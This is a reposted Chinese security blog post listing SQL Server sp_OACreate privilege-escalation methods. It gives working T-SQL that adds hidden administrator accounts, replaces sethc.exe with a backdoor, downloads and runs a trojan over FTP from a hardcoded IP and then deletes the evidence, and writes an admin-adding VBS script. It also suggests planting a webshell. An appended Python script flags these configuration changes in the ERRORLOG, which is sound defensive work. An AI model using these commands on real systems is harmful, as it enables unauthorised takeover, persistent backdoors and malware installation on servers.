Summary of Privilege Escalation Experience with SP_OACreate

颓废  2019-05-19 09:58:29  1,338 views  2,400 characters  8 min read

When xp_cmdshell has been removed or fails, SP_OACreate can be used instead for privilege escalation.

First, enable the component (it is disabled by default in SQL Server 2005):

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure 'Ole Automation Procedures', 1;
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure 'show advanced options', 0;
 
1) Add a user directly

Windows 2000:

declare @shell int
exec sp_oacreate 'wscript.shell',@shell output
exec sp_oamethod @shell,'run',null,'c:/winnt/system32/cmd.exe /c net user 123 123 /add'

declare @shell int
exec sp_oacreate 'wscript.shell',@shell output
exec sp_oamethod @shell,'run',null,'c:/winnt/system32/cmd.exe /c net localgroup administrators 123/add'

Windows XP and 2003:

declare @shell int
exec sp_oacreate 'wscript.shell',@shell output
exec sp_oamethod @shell,'run',null,'c:/windows/system32/cmd.exe /c net user 123$ 123/add'

declare @shell int
exec sp_oacreate 'wscript.shell',@shell output
exec sp_oamethod @shell,'run',null,'c:/windows/system32/cmd.exe /c net localgroup administrators 123$ /add'
 
2) Sticky Keys (sethc.exe) replacement

declare @o int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'copyfile',null,'c:/windows/explorer.exe' ,'c:/windows/system32/sethc.exe';

declare @o int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'copyfile',null,'c:/windows/system32/sethc.exe' ,'c:/windows/system32/dllcache/sethc.exe';

Both the sp_oacreate and sp_oamethod components must be available at the same time.
 
3) Upload a trojan directly

DECLARE @shell INT
EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT
EXEC SP_OAMETHOD @shell,'run',null, '%systemroot%/system32/cmd.exe /c echo open 222.180.210.113 > cmd.txt&echo 123>> cmd.txt&echo123>> cmd.txt&echo binary >> cmd.txt&echo get 1.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&1.exe&1.exe&del cmd.txt. /q /f&del 1.exe /f /q'--

4) Write an add-account script to a startup location

declare @sp_passwordxieo int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @sp_passwordxieo out
exec sp_oamethod @sp_passwordxieo, 'createtextfile', @f out, 'd:/RECYCLER/1.vbs', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,'set wsnetwork=CreateObject("WSCRIPT.NETWORK")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'os="WinNT://"&wsnetwork.ComputerName'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set ob=GetObject(os)'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set oe=GetObject(os&"/Administrators,group")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set od=ob.Create("user","123$")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetPassword "123"'
exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetInfo'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set of=GetObject(os&"/123$",user)'
exec @ret = sp_oamethod @f, 'writeline', NULL,'oe.add os&"/123$"';

5) If the server hosts a website, use method 4) to write a one-line webshell directly.
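Every method above depends on the sp_configure sequence at the top of the post, and that sequence leaves a trace: SQL Server writes a "Configuration option '...' changed from X to Y" message to the ERRORLOG for each change. The script below is an added example (not code from the original post) that scans error-log lines in that documented layout (the exact line format is assumed) and reports when 'Ole Automation Procedures' or xp_cmdshell was switched on and by which spid, run here over a constructed sample excerpt:

```python
"""Flag enabling of OLE Automation / xp_cmdshell in a SQL Server ERRORLOG.

Added example, not from the original post. Assumes the standard ERRORLOG
line layout: "<date> <time> spidNN   Configuration option '<name>' changed
from <old> to <new>. Run the RECONFIGURE statement to install."
"""
import re
from typing import Dict, Iterable, List

# Options that must be enabled before sp_OACreate / xp_cmdshell will run.
RISKY_OPTIONS = {"Ole Automation Procedures", "xp_cmdshell"}

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{2})\s+"
    r"(?P<spid>spid\d+)\s+"
    r"Configuration option '(?P<opt>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)\."
)


def find_enabled_options(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Return one record per risky option that went from 0 to non-zero."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a configuration-change message
        if m["opt"] in RISKY_OPTIONS and m["old"] == "0" and m["new"] != "0":
            hits.append({"ts": m["ts"], "spid": m["spid"], "option": m["opt"]})
    return hits


# Constructed sample ERRORLOG excerpt (not real data). spid55 walks through
# exactly the sequence shown in the post; the other lines are benign.
SAMPLE_LOG = """\
2019-05-19 09:58:29.12 spid55      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2019-05-19 09:58:29.15 spid55      Configuration option 'Ole Automation Procedures' changed from 0 to 1. Run the RECONFIGURE statement to install.
2019-05-19 09:58:29.20 spid55      Configuration option 'show advanced options' changed from 1 to 0. Run the RECONFIGURE statement to install.
2019-05-19 10:12:01.03 spid60      Configuration option 'max server memory (MB)' changed from 2147483647 to 8192. Run the RECONFIGURE statement to install.
2019-05-19 10:30:44.77 spid61      Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.
"""

if __name__ == "__main__":
    for hit in find_enabled_options(SAMPLE_LOG.splitlines()):
        print(f"{hit['ts']} {hit['spid']}: '{hit['option']}' enabled, review this session")
```

On a live instance, the same check can be fed from xp_readerrorlog output or a forwarded copy of the ERRORLOG; disabling the option was logged by the same message, so a 1-to-0 change is deliberately not flagged.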

Author: 珍惜少年时

Reprints must keep this link (CN-SEC中文网; thanks to the original author): http://cn-sec.com/archives/68377.html
